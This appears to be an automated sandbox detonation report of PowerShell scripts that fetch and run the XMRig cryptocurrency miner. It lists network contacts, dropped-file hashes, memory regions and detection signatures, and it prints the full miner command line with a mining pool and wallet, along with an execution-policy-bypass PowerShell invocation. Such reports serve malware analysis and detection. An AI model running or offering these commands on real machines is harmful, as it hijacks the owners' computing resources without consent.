"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 52.111.227.14:443 tcp
US 8.8.8.8:53 11.179.89.13.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp

Files

memory/4240-2-0x00007FFE28E63000-0x00007FFE28E64000-memory.dmp

memory/4240-5-0x000002344F180000-0x000002344F1A2000-memory.dmp

memory/4240-8-0x00007FFE28E60000-0x00007FFE2984C000-memory.dmp

memory/4240-9-0x000002344F430000-0x000002344F4A6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_t4ovhlbb.u5g.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/4240-10-0x00007FFE28E60000-0x00007FFE2984C000-memory.dmp

memory/4240-25-0x00007FFE28E60000-0x00007FFE2984C000-memory.dmp

memory/4240-48-0x000002344F410000-0x000002344F422000-memory.dmp

memory/4240-61-0x000002344F400000-0x000002344F40A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/1880-90-0x000001DBA42C0000-0x000001DBA42E0000-memory.dmp

memory/1880-91-0x00007FF652E10000-0x00007FF653A43000-memory.dmp

memory/1880-92-0x00007FF652E10000-0x00007FF653A43000-memory.dmp

memory/4240-93-0x00007FFE28E63000-0x00007FFE28E64000-memory.dmp

memory/4240-94-0x00007FFE28E60000-0x00007FFE2984C000-memory.dmp

memory/4240-95-0x00007FFE28E60000-0x00007FFE2984C000-memory.dmp

memory/1880-96-0x00007FF652E10000-0x00007FF653A43000-memory.dmp

memory/1880-97-0x00007FF652E10000-0x00007FF653A43000-memory.dmp

memory/1880-98-0x00007FF652E10000-0x00007FF653A43000-memory.dmp

memory/1880-99-0x00007FF652E10000-0x00007FF653A43000-memory.dmp

memory/1880-100-0x00007FF652E10000-0x00007FF653A43000-memory.dmp

memory/1880-101-0x00007FF652E10000-0x00007FF653A43000-memory.dmp

memory/1880-102-0x00007FF652E10000-0x00007FF653A43000-memory.dmp

memory/1880-103-0x00007FF652E10000-0x00007FF653A43000-memory.dmp

memory/1880-104-0x00007FF652E10000-0x00007FF653A43000-memory.dmp

memory/1880-105-0x00007FF652E10000-0x00007FF653A43000-memory.dmp

memory/1880-106-0x00007FF652E10000-0x00007FF653A43000-memory.dmp

memory/1880-107-0x00007FF652E10000-0x00007FF653A43000-memory.dmp

memory/1880-108-0x00007FF652E10000-0x00007FF653A43000-memory.dmp

memory/1880-109-0x00007FF652E10000-0x00007FF653A43000-memory.dmp

memory/1880-110-0x00007FF652E10000-0x00007FF653A43000-memory.dmp

memory/1880-111-0x00007FF652E10000-0x00007FF653A43000-memory.dmp

memory/1880-112-0x00007FF652E10000-0x00007FF653A43000-memory.dmp

memory/1880-113-0x00007FF652E10000-0x00007FF653A43000-memory.dmp

memory/1880-114-0x00007FF652E10000-0x00007FF653A43000-memory.dmp

memory/1880-115-0x00007FF652E10000-0x00007FF653A43000-memory.dmp

memory/1880-116-0x00007FF652E10000-0x00007FF653A43000-memory.dmp

memory/1880-117-0x00007FF652E10000-0x00007FF653A43000-memory.dmp

memory/1880-118-0x00007FF652E10000-0x00007FF653A43000-memory.dmp

memory/1880-119-0x00007FF652E10000-0x00007FF653A43000-memory.dmp

memory/1880-120-0x00007FF652E10000-0x00007FF653A43000-memory.dmp

memory/1880-121-0x00007FF652E10000-0x00007FF653A43000-memory.dmp

memory/1880-122-0x00007FF652E10000-0x00007FF653A43000-memory.dmp

memory/1880-123-0x00007FF652E10000-0x00007FF653A43000-memory.dmp

memory/1880-124-0x00007FF652E10000-0x00007FF653A43000-memory.dmp

memory/1880-125-0x00007FF652E10000-0x00007FF653A43000-memory.dmp

memory/1880-126-0x00007FF652E10000-0x00007FF653A43000-memory.dmp

memory/1880-127-0x00007FF652E10000-0x00007FF653A43000-memory.dmp

memory/1880-128-0x00007FF652E10000-0x00007FF653A43000-memory.dmp

memory/1880-129-0x00007FF652E10000-0x00007FF653A43000-memory.dmp

memory/1880-130-0x00007FF652E10000-0x00007FF653A43000-memory.dmp

memory/1880-131-0x00007FF652E10000-0x00007FF653A43000-memory.dmp

memory/1880-132-0x00007FF652E10000-0x00007FF653A43000-memory.dmp

memory/1880-133-0x00007FF652E10000-0x00007FF653A43000-memory.dmp

memory/1880-134-0x00007FF652E10000-0x00007FF653A43000-memory.dmp

memory/1880-135-0x00007FF652E10000-0x00007FF653A43000-memory.dmp

memory/1880-136-0x00007FF652E10000-0x00007FF653A43000-memory.dmp

memory/1880-137-0x00007FF652E10000-0x00007FF653A43000-memory.dmp

memory/1880-138-0x00007FF652E10000-0x00007FF653A43000-memory.dmp

memory/1880-139-0x00007FF652E10000-0x00007FF653A43000-memory.dmp

memory/1880-140-0x00007FF652E10000-0x00007FF653A43000-memory.dmp

memory/1880-141-0x00007FF652E10000-0x00007FF653A43000-memory.dmp

memory/1880-142-0x00007FF652E10000-0x00007FF653A43000-memory.dmp

memory/1880-143-0x00007FF652E10000-0x00007FF653A43000-memory.dmp

memory/1880-144-0x00007FF652E10000-0x00007FF653A43000-memory.dmp

memory/1880-145-0x00007FF652E10000-0x00007FF653A43000-memory.dmp

memory/1880-146-0x00007FF652E10000-0x00007FF653A43000-memory.dmp

memory/1880-147-0x00007FF652E10000-0x00007FF653A43000-memory.dmp

memory/1880-148-0x00007FF652E10000-0x00007FF653A43000-memory.dmp

memory/1880-149-0x00007FF652E10000-0x00007FF653A43000-memory.dmp

memory/1880-150-0x00007FF652E10000-0x00007FF653A43000-memory.dmp

memory/1880-151-0x00007FF652E10000-0x00007FF653A43000-memory.dmp

memory/1880-152-0x00007FF652E10000-0x00007FF653A43000-memory.dmp

memory/1880-153-0x00007FF652E10000-0x00007FF653A43000-memory.dmp

memory/1880-154-0x00007FF652E10000-0x00007FF653A43000-memory.dmp

memory/1880-155-0x00007FF652E10000-0x00007FF653A43000-memory.dmp

memory/1880-156-0x00007FF652E10000-0x00007FF653A43000-memory.dmp

Analysis: behavioral12

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 03:59

Platform

win11-20240426-en

Max time kernel

1799s

Max time network

1770s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 185.199.111.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.111.199.185.in-addr.arpa udp
GB 161.35.34.195:443 rx.unmineable.com tcp

Files

memory/4764-0-0x00007FFF10393000-0x00007FFF10395000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_kluvmv3n.c4l.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4764-9-0x0000025350780000-0x00000253507A2000-memory.dmp

memory/4764-10-0x00007FFF10390000-0x00007FFF10E52000-memory.dmp

memory/4764-11-0x00007FFF10390000-0x00007FFF10E52000-memory.dmp

memory/4764-12-0x00007FFF10390000-0x00007FFF10E52000-memory.dmp

memory/4764-15-0x0000025350920000-0x000002535092A000-memory.dmp

memory/4764-14-0x0000025350930000-0x0000025350942000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/2324-46-0x00000204DD9D0000-0x00000204DD9F0000-memory.dmp

memory/2324-47-0x00000204DDA20000-0x00000204DDA40000-memory.dmp

memory/2324-48-0x00007FF791230000-0x00007FF791E63000-memory.dmp

memory/2324-50-0x00000204DF200000-0x00000204DF220000-memory.dmp

memory/2324-51-0x00000204DF220000-0x00000204DF240000-memory.dmp

memory/2324-49-0x00007FF791230000-0x00007FF791E63000-memory.dmp

memory/4764-52-0x00007FFF10390000-0x00007FFF10E52000-memory.dmp

memory/4764-53-0x00007FFF10393000-0x00007FFF10395000-memory.dmp

memory/4764-54-0x00007FFF10390000-0x00007FFF10E52000-memory.dmp

memory/4764-55-0x00007FFF10390000-0x00007FFF10E52000-memory.dmp

memory/2324-56-0x00007FF791230000-0x00007FF791E63000-memory.dmp

memory/2324-57-0x00007FF791230000-0x00007FF791E63000-memory.dmp

memory/2324-58-0x00000204DF200000-0x00000204DF220000-memory.dmp

memory/2324-59-0x00000204DF220000-0x00000204DF240000-memory.dmp

memory/2324-60-0x00007FF791230000-0x00007FF791E63000-memory.dmp

memory/2324-61-0x00007FF791230000-0x00007FF791E63000-memory.dmp

memory/2324-62-0x00007FF791230000-0x00007FF791E63000-memory.dmp

memory/2324-63-0x00007FF791230000-0x00007FF791E63000-memory.dmp

memory/2324-64-0x00007FF791230000-0x00007FF791E63000-memory.dmp

memory/2324-65-0x00007FF791230000-0x00007FF791E63000-memory.dmp

memory/2324-66-0x00007FF791230000-0x00007FF791E63000-memory.dmp

memory/2324-67-0x00007FF791230000-0x00007FF791E63000-memory.dmp

memory/2324-68-0x00007FF791230000-0x00007FF791E63000-memory.dmp

memory/2324-69-0x00007FF791230000-0x00007FF791E63000-memory.dmp

memory/2324-70-0x00007FF791230000-0x00007FF791E63000-memory.dmp

memory/2324-71-0x00007FF791230000-0x00007FF791E63000-memory.dmp

memory/2324-72-0x00007FF791230000-0x00007FF791E63000-memory.dmp

memory/2324-73-0x00007FF791230000-0x00007FF791E63000-memory.dmp

memory/2324-74-0x00007FF791230000-0x00007FF791E63000-memory.dmp

memory/2324-75-0x00007FF791230000-0x00007FF791E63000-memory.dmp

memory/2324-76-0x00007FF791230000-0x00007FF791E63000-memory.dmp

memory/2324-77-0x00007FF791230000-0x00007FF791E63000-memory.dmp

memory/2324-78-0x00007FF791230000-0x00007FF791E63000-memory.dmp

memory/2324-79-0x00007FF791230000-0x00007FF791E63000-memory.dmp

memory/2324-80-0x00007FF791230000-0x00007FF791E63000-memory.dmp

memory/2324-81-0x00007FF791230000-0x00007FF791E63000-memory.dmp

memory/2324-82-0x00007FF791230000-0x00007FF791E63000-memory.dmp

memory/2324-83-0x00007FF791230000-0x00007FF791E63000-memory.dmp

memory/2324-84-0x00007FF791230000-0x00007FF791E63000-memory.dmp

memory/2324-85-0x00007FF791230000-0x00007FF791E63000-memory.dmp

memory/2324-86-0x00007FF791230000-0x00007FF791E63000-memory.dmp

memory/2324-87-0x00007FF791230000-0x00007FF791E63000-memory.dmp

memory/2324-88-0x00007FF791230000-0x00007FF791E63000-memory.dmp

memory/2324-89-0x00007FF791230000-0x00007FF791E63000-memory.dmp

memory/2324-90-0x00007FF791230000-0x00007FF791E63000-memory.dmp

memory/2324-91-0x00007FF791230000-0x00007FF791E63000-memory.dmp

memory/2324-92-0x00007FF791230000-0x00007FF791E63000-memory.dmp

memory/2324-93-0x00007FF791230000-0x00007FF791E63000-memory.dmp

memory/2324-94-0x00007FF791230000-0x00007FF791E63000-memory.dmp

memory/2324-95-0x00007FF791230000-0x00007FF791E63000-memory.dmp

memory/2324-96-0x00007FF791230000-0x00007FF791E63000-memory.dmp

memory/2324-97-0x00007FF791230000-0x00007FF791E63000-memory.dmp

memory/2324-98-0x00007FF791230000-0x00007FF791E63000-memory.dmp

memory/2324-99-0x00007FF791230000-0x00007FF791E63000-memory.dmp

memory/2324-100-0x00007FF791230000-0x00007FF791E63000-memory.dmp

memory/2324-101-0x00007FF791230000-0x00007FF791E63000-memory.dmp

memory/2324-102-0x00007FF791230000-0x00007FF791E63000-memory.dmp

memory/2324-103-0x00007FF791230000-0x00007FF791E63000-memory.dmp

memory/2324-104-0x00007FF791230000-0x00007FF791E63000-memory.dmp

memory/2324-105-0x00007FF791230000-0x00007FF791E63000-memory.dmp

memory/2324-106-0x00007FF791230000-0x00007FF791E63000-memory.dmp

memory/2324-107-0x00007FF791230000-0x00007FF791E63000-memory.dmp

memory/2324-108-0x00007FF791230000-0x00007FF791E63000-memory.dmp

memory/2324-109-0x00007FF791230000-0x00007FF791E63000-memory.dmp

memory/2324-110-0x00007FF791230000-0x00007FF791E63000-memory.dmp

memory/2324-111-0x00007FF791230000-0x00007FF791E63000-memory.dmp

memory/2324-112-0x00007FF791230000-0x00007FF791E63000-memory.dmp

memory/2324-113-0x00007FF791230000-0x00007FF791E63000-memory.dmp

memory/2324-114-0x00007FF791230000-0x00007FF791E63000-memory.dmp

memory/2324-115-0x00007FF791230000-0x00007FF791E63000-memory.dmp

memory/2324-116-0x00007FF791230000-0x00007FF791E63000-memory.dmp

memory/2324-117-0x00007FF791230000-0x00007FF791E63000-memory.dmp

memory/2324-118-0x00007FF791230000-0x00007FF791E63000-memory.dmp

Analysis: behavioral20

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 04:11

Platform

win11-20240426-en

Max time kernel

1798s

Max time network

1799s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp

Files

memory/1228-0-0x00007FFE180D3000-0x00007FFE180D5000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_gmyqtuxk.mbn.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1228-9-0x0000015CE7280000-0x0000015CE72A2000-memory.dmp

memory/1228-10-0x00007FFE180D0000-0x00007FFE18B92000-memory.dmp

memory/1228-11-0x00007FFE180D0000-0x00007FFE18B92000-memory.dmp

memory/1228-12-0x00007FFE180D0000-0x00007FFE18B92000-memory.dmp

memory/1228-14-0x0000015CE78B0000-0x0000015CE78C2000-memory.dmp

memory/1228-15-0x0000015CE7640000-0x0000015CE764A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/4728-46-0x0000018263520000-0x0000018263540000-memory.dmp

memory/4728-47-0x0000018264E20000-0x0000018264E40000-memory.dmp

memory/4728-48-0x00007FF6C4850000-0x00007FF6C5483000-memory.dmp

memory/4728-50-0x0000018264E60000-0x0000018264E80000-memory.dmp

memory/4728-49-0x0000018264E40000-0x0000018264E60000-memory.dmp

memory/4728-51-0x00007FF6C4850000-0x00007FF6C5483000-memory.dmp

memory/1228-52-0x00007FFE180D3000-0x00007FFE180D5000-memory.dmp

memory/1228-53-0x00007FFE180D0000-0x00007FFE18B92000-memory.dmp

memory/4728-54-0x00007FF6C4850000-0x00007FF6C5483000-memory.dmp

memory/4728-55-0x00007FF6C4850000-0x00007FF6C5483000-memory.dmp

memory/4728-56-0x0000018264E40000-0x0000018264E60000-memory.dmp

memory/4728-57-0x0000018264E60000-0x0000018264E80000-memory.dmp

memory/4728-58-0x00007FF6C4850000-0x00007FF6C5483000-memory.dmp

memory/4728-59-0x00007FF6C4850000-0x00007FF6C5483000-memory.dmp

memory/4728-60-0x00007FF6C4850000-0x00007FF6C5483000-memory.dmp

memory/4728-61-0x00007FF6C4850000-0x00007FF6C5483000-memory.dmp

memory/4728-62-0x00007FF6C4850000-0x00007FF6C5483000-memory.dmp

memory/4728-63-0x00007FF6C4850000-0x00007FF6C5483000-memory.dmp

memory/4728-64-0x00007FF6C4850000-0x00007FF6C5483000-memory.dmp

memory/4728-65-0x00007FF6C4850000-0x00007FF6C5483000-memory.dmp

memory/4728-66-0x00007FF6C4850000-0x00007FF6C5483000-memory.dmp

memory/4728-67-0x00007FF6C4850000-0x00007FF6C5483000-memory.dmp

memory/4728-68-0x00007FF6C4850000-0x00007FF6C5483000-memory.dmp

memory/4728-69-0x00007FF6C4850000-0x00007FF6C5483000-memory.dmp

memory/4728-70-0x00007FF6C4850000-0x00007FF6C5483000-memory.dmp

memory/4728-71-0x00007FF6C4850000-0x00007FF6C5483000-memory.dmp

memory/4728-72-0x00007FF6C4850000-0x00007FF6C5483000-memory.dmp

memory/4728-73-0x00007FF6C4850000-0x00007FF6C5483000-memory.dmp

memory/4728-74-0x00007FF6C4850000-0x00007FF6C5483000-memory.dmp

memory/4728-75-0x00007FF6C4850000-0x00007FF6C5483000-memory.dmp

memory/4728-76-0x00007FF6C4850000-0x00007FF6C5483000-memory.dmp

memory/4728-77-0x00007FF6C4850000-0x00007FF6C5483000-memory.dmp

memory/4728-78-0x00007FF6C4850000-0x00007FF6C5483000-memory.dmp

memory/4728-79-0x00007FF6C4850000-0x00007FF6C5483000-memory.dmp

memory/4728-80-0x00007FF6C4850000-0x00007FF6C5483000-memory.dmp

memory/4728-81-0x00007FF6C4850000-0x00007FF6C5483000-memory.dmp

memory/4728-82-0x00007FF6C4850000-0x00007FF6C5483000-memory.dmp

memory/4728-83-0x00007FF6C4850000-0x00007FF6C5483000-memory.dmp

memory/4728-84-0x00007FF6C4850000-0x00007FF6C5483000-memory.dmp

memory/4728-85-0x00007FF6C4850000-0x00007FF6C5483000-memory.dmp

memory/4728-86-0x00007FF6C4850000-0x00007FF6C5483000-memory.dmp

memory/4728-87-0x00007FF6C4850000-0x00007FF6C5483000-memory.dmp

memory/4728-88-0x00007FF6C4850000-0x00007FF6C5483000-memory.dmp

memory/4728-89-0x00007FF6C4850000-0x00007FF6C5483000-memory.dmp

memory/4728-90-0x00007FF6C4850000-0x00007FF6C5483000-memory.dmp

memory/4728-91-0x00007FF6C4850000-0x00007FF6C5483000-memory.dmp

memory/4728-92-0x00007FF6C4850000-0x00007FF6C5483000-memory.dmp

memory/4728-93-0x00007FF6C4850000-0x00007FF6C5483000-memory.dmp

memory/4728-94-0x00007FF6C4850000-0x00007FF6C5483000-memory.dmp

memory/4728-95-0x00007FF6C4850000-0x00007FF6C5483000-memory.dmp

memory/4728-96-0x00007FF6C4850000-0x00007FF6C5483000-memory.dmp

memory/4728-97-0x00007FF6C4850000-0x00007FF6C5483000-memory.dmp

memory/4728-98-0x00007FF6C4850000-0x00007FF6C5483000-memory.dmp

memory/4728-99-0x00007FF6C4850000-0x00007FF6C5483000-memory.dmp

memory/4728-100-0x00007FF6C4850000-0x00007FF6C5483000-memory.dmp

memory/4728-101-0x00007FF6C4850000-0x00007FF6C5483000-memory.dmp

memory/4728-102-0x00007FF6C4850000-0x00007FF6C5483000-memory.dmp

memory/4728-103-0x00007FF6C4850000-0x00007FF6C5483000-memory.dmp

memory/4728-104-0x00007FF6C4850000-0x00007FF6C5483000-memory.dmp

memory/4728-105-0x00007FF6C4850000-0x00007FF6C5483000-memory.dmp

memory/4728-106-0x00007FF6C4850000-0x00007FF6C5483000-memory.dmp

memory/4728-107-0x00007FF6C4850000-0x00007FF6C5483000-memory.dmp

memory/4728-108-0x00007FF6C4850000-0x00007FF6C5483000-memory.dmp

memory/4728-109-0x00007FF6C4850000-0x00007FF6C5483000-memory.dmp

memory/4728-110-0x00007FF6C4850000-0x00007FF6C5483000-memory.dmp

memory/4728-111-0x00007FF6C4850000-0x00007FF6C5483000-memory.dmp

memory/4728-112-0x00007FF6C4850000-0x00007FF6C5483000-memory.dmp

memory/4728-113-0x00007FF6C4850000-0x00007FF6C5483000-memory.dmp

memory/4728-114-0x00007FF6C4850000-0x00007FF6C5483000-memory.dmp

